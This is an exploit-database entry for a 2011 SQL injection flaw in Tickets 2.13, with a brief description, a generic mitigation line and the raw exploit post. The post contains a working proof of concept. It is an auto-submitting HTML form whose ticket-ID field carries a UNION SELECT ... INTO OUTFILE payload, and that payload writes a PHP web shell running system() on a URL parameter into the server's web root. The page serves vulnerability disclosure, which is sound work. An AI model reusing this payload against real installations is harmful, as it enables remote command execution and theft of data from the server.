header-logo
Suggest Exploit
vendor:
Tickets 2.13
by:
AutoSec Tools
9
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: Tickets 2.13
Affected Version From: 2.13
Affected Version To: 2.13
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Vista + XAMPP
2011

Tickets 2.13

A sql injection vulnerability in Tickets 2.13 can be exploited to extract arbitrary data. In some environments it may be possible to create a PHP shell.

Mitigation:

Input validation and sanitization should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

<!------------------------------------------------------------------------
# Software................Tickets 2.13
# Vulnerability...........SQL Injection
# Threat Level............Critical (4/5)
# Download................http://www.ticketscad.org/
# Discovery Date..........5/24/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <john@autosectools.com>
# ------------------------------------------------------------------------
# 
# 
# --Description--
# 
# A sql injection vulnerability in Tickets 2.13 can be exploited to
# extract arbitrary data. In some environments it may be possible to
# create a PHP shell.
# 
# 
# --PoC-->

<html>
 <body onload="document.forms[0].submit()"> 
  <form method="POST" action="http://localhost/tickets/add_note.php">  
   <input type="hidden" name="frm_ticket_id" value="0 UNION SELECT '<?php echo system($_GET["CMD"]); ?>','','','','','','','','','','','','','','','','','','','','','','','','','' FROM dual INTO OUTFILE '../../htdocs/shell.php';#" />   
  </form>
 </body>
</html>